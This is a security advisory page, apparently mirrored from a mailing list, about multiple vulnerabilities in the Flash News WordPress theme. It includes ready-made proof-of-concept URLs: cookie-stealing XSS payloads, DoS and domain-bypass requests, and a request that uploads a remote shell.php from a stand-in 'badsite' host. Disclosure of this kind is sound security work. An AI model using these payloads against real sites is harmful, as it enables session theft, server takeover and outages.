Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Flash News XSS / DoS / Path Disclosure / Shell Upload

🗓️ 02 Feb 2013 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Warning about Multiple Vulnerabilities in Flash News WordPress Them

Code
`Hello list!  
  
I want to warn you about multiple vulnerabilities in Flash News theme for   
WordPress. This is commercial theme for WP from WooThemes.  
  
These are Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality, Denial of Service, Arbitrary File Upload and Information   
Leakage vulnerabilities.  
  
In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality and Denial of Service vulnerabilities in TimThumb and multiple   
themes for WordPress (http://websecurity.com.ua/4910/), and later also was   
disclosed Arbitrary File Uploading vulnerability. After previous advisory,   
I've wrote another one about multiple themes from WooThemes   
(http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site   
Scripting vulnerabilities (only part of their themes were affected).  
  
If two years ago I've wrote about holes in TimThumb and multiples themes   
from WooThemes (where I mentioned Flash News), then this time I wrote   
directly about this particular theme. And also I've added other holes in it.  
  
This is example for Flash News theme. In other themes from WooThemes the   
situation is similar. In above-mentioned advisory I've listed 89 vulnerable   
themes for WP from WooThemes.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Flash News theme for WordPress (in last   
versions there were fixed only vulnerabilities in thumb.php). I've informed   
developers about these vulnerabilities already in beginning of 2011 (as   
about holes in TimThumb, as about holes in their native scripts in their   
themes - for WordPress and other engines).  
  
After two years since I've informed WooThemes developers, there are hundreds   
thousands of sites with only Flash News theme (not mentioning all other   
themes), according to Google, and all of them are still vulnerable to many   
of these vulnerabilities. Mostly were fixed holes in thumb.php, but not in   
other vulnerable scripts of the theme, and there are many sites which have   
fixed only part of the holes in TimThumb in the theme. E.g. they fixed Code   
Execution (AFU), AoF and DoS holes, but XSS and FPD holes were left.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/flashnews/thumb.php?src=1  
  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111  
  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1  
  
Abuse of Functionality (WASC-42):  
  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
DoS (WASC-10):  
  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
About such Abuse of Functionality and Denial of Service vulnerabilities you   
can read in my article Using of the sites for attacks on other sites   
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).  
  
Arbitrary File Upload (WASC-31) (in not fixed versions of TimThumb):  
  
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/flashnews/  
  
Besides index.php there are also potentially FPD in other php-files of this   
theme.  
  
Information Leakage (WASC-13):  
  
http://site/wp-content/themes/flashnews/includes/test.php  
  
Script with phpinfo.  
  
XSS (WASC-08):  
  
http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where was possible to conduct   
XSS via phpinfo).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
wordpressflash newswoothemescross-site scriptingfull path disclosureabuse of functionalitydenial of servicearbitrary file uploadinformation leakagetimthumbvulnerabilitiessecurity advisory
24